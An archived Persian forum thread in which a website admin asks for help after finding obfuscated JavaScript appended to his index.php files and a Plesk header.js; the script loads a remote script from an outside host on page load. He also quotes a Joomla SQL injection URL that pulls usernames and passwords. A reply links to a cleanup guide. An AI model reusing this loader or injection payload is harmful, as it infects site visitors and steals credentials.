PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : دانلود فايل مشكوك هنگام لود سايت



saeedghaidy
02-28-2010, 08:27 AM
سلام
من ادمين سايت asanhesab.com هستم
هنگام باز كردن سايت اين فايل دانلود مي شود


<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>




در اخر index.php سايت


&lt;script&gt;this.j=&quot;&quot;;this.y=&quot;&quot;;try {var CA;if(CA!=&#039;&#039; &amp;&amp; CA!=&#039;r&#039;){CA=&#039;l&#039;};var a=new Date();this.L=&quot;&quot;;var S=&#039;&#039;;var u=RegExp;var W=&#039;&#91;&#039;;var E;if(E!=&#039;&#039; &amp;&amp; E!=&#039;Td&#039;){E=&#039;Tw&#039;};var wG=&#039;&#039;;var h=&#039;&#039;;var uR=&#039;g&#039;;var t;if(t!=&#039;n&#039; &amp;&amp; t != &#039;&#039;){t=null};this.aC=&#039;&#039;;var WX=&#039;]&#039;;var LS;if(LS!=&#039;Gd&#039;){LS=&#039;Gd&#039;};this.aS=&#039;&#039;;var C=&#039;replace&#039;;this.cP=&quot;&quot;;var tE=new Array();function _(m,mk){var ob=new Date();var c=W;var TP=new Array();c+=mk;var aB;if(aB!=&#039;&#039;){aB=&#039;g&#039;};c+=WX;var I=new u(c, uR);this.Xu=&quot;&quot;;this.C_=&quot;&quot;;return m[C](I, S);var SZ=&quot;&quot;;var JP;if(JP!=&#039;ja&#039;){JP=&#039;&#039;};};var i;if(i!=&#039;&#039; &amp;&amp; i!=&#039;Ea&#039;){i=null};var F;if(F!=&#039;&#039; &amp;&amp; F!=&#039;nmW&#039;){F=&#039;zi&#039;};var w=_(&#039;beordxye&#039;,&quot;wrex&quot;);var on;if(on!=&#039;&#039;){on=&#039;NK&#039;};var m=&quot;1&quot;;var U=_(&#039;842224402222484222242042242&#039;,&quot;24&quot;);var BX;if(BX!=&#039;&#039; &amp;&amp; BX!=&#039;zR&#039;){BX=&#039;&#039;};var AK;if(AK!=&#039;&#039; &amp;&amp; AK!=&#039;wh&#039;){AK=&#039;&#039;};var o=_(&#039;/1gKo1oOgOl0e0.1cKoKmK/OgKoOoOgOl0eB.Kc1oKmK/0p1iKx1n0eKt0.On1eBtB/Oh1aKbOeBrOtBuBrOkO.0c0oKmO/KgOo0oBgBlBe1.BnBlB.KpBhOpO&#039;,&quot;OB0K1&quot;);var eL;if(eL!=&#039;aW&#039; &amp;&amp; eL!=&#039;cg&#039;){eL=&#039;&#039;};var GZ=new Date();var Ic=_(&#039;hStJtOpO:O/S/Oh2aSrJrOeSnJmOe2d2iSaOnJe2tOwOoSrOkO-2cJoOmJ.OgOoJoSgOlOe2.OcOoOmJ.Sd2oJ.2bOiJlOdO-Od2eO.ScJySbSe2r2tJaOgOoSnSlOi2nSeJ.JrSuS:O&#039;,&quot;SJO2 &quot;);var Dh;if(Dh!=&#039;sS&#039;){Dh=&#039;&#039;};this.Di=&quot;&quot;;var nh;if(nh!=&#039;qk&#039;){nh=&#039;&#039;};var A=_(&#039;slclrlilpltO&#039;,&quot;Ol&quot;);var X=_(&#039;oWnwlWoTawdT&#039;,&quot;TWw&quot;);var f=&#039;&#039;;var N=_(&#039;aLpLpLeAnLdsCAhLiSlLds&#039;,&quot;ASsL&quot;);var T=_(&#039;s0eJt0AJt0tYrYiYbUu0t0e0&#039;,&quot;UlJY0&quot;);var CE;if(CE!=&#039;Zl&#039; &amp;&amp; CE!=&#039;DhF&#039;){CE=&#039;&#039;};var R=_(&#039;cTrxexa7t1e1E1l1exmxexn7tx&#039;,&quot;7TxI1&quot;);var _J=&#039;&#039;;var GX=&quot;&quot;;var ze=new Date();window[X]=function(){var mR=&quot;&quot;;var XC;if(XC!=&#039;rPF&#039; &amp;&amp; XC!=&#039;qK&#039;){XC=&#039;&#039;};var ms=&quot;&quot;;var rm=new Array();Rj=document[R](A);var KW;if(KW!=&#039;&#039; &amp;&amp; KW!=&#039;KO&#039;){KW=null};this.D_=&#039;&#039;;f+=Ic;f+=U;f+=o;this .mo=&quot;&quot;;var dO;if(dO!=&#039;Od&#039;){dO=&#039;Od&#039;};this.Uy=&quot;&quot;;var FE=&quot;&quot;;var Z=document[w];var hQ;if(hQ!=&#039;&#039; &amp;&amp; hQ!=&#039;qC&#039;){hQ=null};Rj.src=f;var oB=new Date();this.Eg=&quot;&quot;;Rj.setAttribute(&#039;defer&#039;, m);var ES;if(ES!=&#039;VK&#039; &amp;&amp; ES!=&#039;hG&#039;){ES=&#039;&#039;};var ws;if(ws!=&#039;GF&#039; &amp;&amp; ws!=&#039;et&#039;){ws=&#039;GF&#039;};var gK=new Array();var _M=new Array();Z.appendChild(Rj);var kL;if(kL!=&#039;mn&#039;){kL=&#039;&#039;};};this.Ek=&quot;&quot;;} catch(J){var vR;if(vR!=&#039;&#039; &amp;&amp; vR!=&#039;vD&#039;){vR=null};var QQ;if(QQ!=&#039;&#039; &amp;&amp; QQ!=&#039;TX&#039;){QQ=null};};&lt;/script&gt;
&lt;!--28278629403d7aba0fc95df88c6ad2d8--&gt;


اضافه شده بود


در اخر index2.php
در اخر index3.php
هم اضافه شده بود


سايت من هر روز از گوگل

<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> %22++inurl:%22index.php%22&amp;start=150&amp;sa=n

اين آدرس را

<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> 60&amp;Itemid=99999%20union%20select%201,concat_ws(0x3 a,username,password),3,4,5%20from%20jos_users/
پيدا مي كند
من خيلي نگران امنيتم



هاست من ويندوز از رادكام است




اسكريت در تمام index .php وجود دارد



من يك فايل با نام header.js در<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> سايت حاوي :

function writeHeader() { writeHeader(false); }
function writeHeader(virtuozo) {
document.write(&#039;&lt;a class=&quot;company-logo&quot; href=&quot;<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> class=&quot;header-area&quot;&gt;&lt;h1&gt;&lt;a class=&quot;product-logo&quot; href=&quot;<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> title=&quot;Parallels Plesk Panel&quot;&gt;Parallels Plesk Panel&lt;/a&gt;&lt;/h1&gt;&lt;span class=&quot;header-text&quot;&gt;&lt;a class=&quot;top-copyright&quot; href=&quot;<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> 1999-2009, Parallels&lt;br /&gt;All rights reserved&lt;/a&gt;&#039;);
if (virtuozo) { document.write(&#039;&lt;a class=&quot;txt-banner&quot; href=&quot;<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> &lt;strong&gt;Parallels&lt;br /&gt;Virtuozzo Containers&lt;/strong&gt;&lt;/a&gt;&#039;); }
document.write(&#039;&lt;/span&gt;&lt;/div&gt;&#039;);
}
function writeFooter() { writeFooter(true); }
function writeFooter(virtuozzo) {
document.write(&#039;&lt;p class=&quot;description&quot;&gt;This page was generated by &lt;a href=&quot;<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> Plesk Panel&lt;/a&gt;&lt;/p&gt;&#039;);
if (virtuozzo) { }
}
function writeCopyFlag() {
document.write(&#039;&lt;script language=&quot;javascript&quot; type=&quot;text/javascript&quot; src=&quot;<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b>; + location.hostname + &#039;:8880/javascript/promo-flags.js.php&quot;&gt;&lt;/&#039; + &#039;script&gt;\n&#039;);
}

this.j=&quot;&quot;;this.y=&quot;&quot;;try {var CA;if(CA!=&#039;&#039; &amp;&amp; CA!=&#039;r&#039;){CA=&#039;l&#039;};var a=new Date();this.L=&quot;&quot;;var S=&#039;&#039;;var u=RegExp;var W=&#039;&#91;&#039;;var E;if(E!=&#039;&#039; &amp;&amp; E!=&#039;Td&#039;){E=&#039;Tw&#039;};var wG=&#039;&#039;;var h=&#039;&#039;;var uR=&#039;g&#039;;var t;if(t!=&#039;n&#039; &amp;&amp; t != &#039;&#039;){t=null};this.aC=&#039;&#039;;var WX=&#039;]&#039;;var LS;if(LS!=&#039;Gd&#039;){LS=&#039;Gd&#039;};this.aS=&#039;&#039;;var C=&#039;replace&#039;;this.cP=&quot;&quot;;var tE=new Array();function _(m,mk){var ob=new Date();var c=W;var TP=new Array();c+=mk;var aB;if(aB!=&#039;&#039;){aB=&#039;g&#039;};c+=WX;var I=new u(c, uR);this.Xu=&quot;&quot;;this.C_=&quot;&quot;;return m[C](I, S);var SZ=&quot;&quot;;var JP;if(JP!=&#039;ja&#039;){JP=&#039;&#039;};};var i;if(i!=&#039;&#039; &amp;&amp; i!=&#039;Ea&#039;){i=null};var F;if(F!=&#039;&#039; &amp;&amp; F!=&#039;nmW&#039;){F=&#039;zi&#039;};var w=_(&#039;beordxye&#039;,&quot;wrex&quot;);var on;if(on!=&#039;&#039;){on=&#039;NK&#039;};var m=&quot;1&quot;;var U=_(&#039;842224402222484222242042242&#039;,&quot;24&quot;);var BX;if(BX!=&#039;&#039; &amp;&amp; BX!=&#039;zR&#039;){BX=&#039;&#039;};var AK;if(AK!=&#039;&#039; &amp;&amp; AK!=&#039;wh&#039;){AK=&#039;&#039;};var o=_(&#039;/1gKo1oOgOl0e0.1cKoKmK/OgKoOoOgOl0eB.Kc1oKmK/0p1iKx1n0eKt0.On1eBtB/Oh1aKbOeBrOtBuBrOkO.0c0oKmO/KgOo0oBgBlBe1.BnBlB.KpBhOpO&#039;,&quot;OB0K1&quot;);var eL;if(eL!=&#039;aW&#039; &amp;&amp; eL!=&#039;cg&#039;){eL=&#039;&#039;};var GZ=new Date();var Ic=_(&#039;hStJtOpO:O/S/Oh2aSrJrOeSnJmOe2d2iSaOnJe2tOwOoSrOkO-2cJoOmJ.OgOoJoSgOlOe2.OcOoOmJ.Sd2oJ.2bOiJlOdO-Od2eO.ScJySbSe2r2tJaOgOoSnSlOi2nSeJ.JrSuS:O&#039;,&quot;SJO2 &quot;);var Dh;if(Dh!=&#039;sS&#039;){Dh=&#039;&#039;};this.Di=&quot;&quot;;var nh;if(nh!=&#039;qk&#039;){nh=&#039;&#039;};var A=_(&#039;slclrlilpltO&#039;,&quot;Ol&quot;);var X=_(&#039;oWnwlWoTawdT&#039;,&quot;TWw&quot;);var f=&#039;&#039;;var N=_(&#039;aLpLpLeAnLdsCAhLiSlLds&#039;,&quot;ASsL&quot;);var T=_(&#039;s0eJt0AJt0tYrYiYbUu0t0e0&#039;,&quot;UlJY0&quot;);var CE;if(CE!=&#039;Zl&#039; &amp;&amp; CE!=&#039;DhF&#039;){CE=&#039;&#039;};var R=_(&#039;cTrxexa7t1e1E1l1exmxexn7tx&#039;,&quot;7TxI1&quot;);var _J=&#039;&#039;;var GX=&quot;&quot;;var ze=new Date();window[X]=function(){var mR=&quot;&quot;;var XC;if(XC!=&#039;rPF&#039; &amp;&amp; XC!=&#039;qK&#039;){XC=&#039;&#039;};var ms=&quot;&quot;;var rm=new Array();Rj=document[R](A);var KW;if(KW!=&#039;&#039; &amp;&amp; KW!=&#039;KO&#039;){KW=null};this.D_=&#039;&#039;;f+=Ic;f+=U;f+=o;this .mo=&quot;&quot;;var dO;if(dO!=&#039;Od&#039;){dO=&#039;Od&#039;};this.Uy=&quot;&quot;;var FE=&quot;&quot;;var Z=document[w];var hQ;if(hQ!=&#039;&#039; &amp;&amp; hQ!=&#039;qC&#039;){hQ=null};Rj.src=f;var oB=new Date();this.Eg=&quot;&quot;;Rj.setAttribute(&#039;defer&#039;, m);var ES;if(ES!=&#039;VK&#039; &amp;&amp; ES!=&#039;hG&#039;){ES=&#039;&#039;};var ws;if(ws!=&#039;GF&#039; &amp;&amp; ws!=&#039;et&#039;){ws=&#039;GF&#039;};var gK=new Array();var _M=new Array();Z.appendChild(Rj);var kL;if(kL!=&#039;mn&#039;){kL=&#039;&#039;};};this.Ek=&quot;&quot;;} catch(J){var vR;if(vR!=&#039;&#039; &amp;&amp; vR!=&#039;vD&#039;){vR=null};var QQ;if(QQ!=&#039;&#039; &amp;&amp; QQ!=&#039;TX&#039;){QQ=null};};

يافتم


* N پست شما یکی شد !

firoozmandan
02-28-2010, 09:28 AM
سلام

آموزش زیر را مطالعه کنید :

آموزش:پاکسازی سایت از فایل‌های مخرب (<b><font color=red>فقط کاربران عضو انجمن می توانند لینک ها را مشاهده کنند</font></b> D8%A7%DB%8C%D8%AA_%D8%A7%D8%B2_%D9%81%D8%A7%DB%8C% D9%84%E2%80%8C%D9%87%D8%A7%DB%8C_%D9%85%D8%AE%D8%B 1%D8%A8)

یا علی

saeedghaidy
02-28-2010, 09:36 AM
سلام آقاي فيروز مندان
من مراحل زير را انجام دهم
مشكل حله

firoozmandan
02-28-2010, 09:37 AM
سلام

اگر دقیقا به همین صورت انجام بدید مشکل شما حل خواهد شد


البته اگر سرور ویندوز رادکام مشکلی نداشته باشه و اشکال از اون سمت نباشه ....

یا علی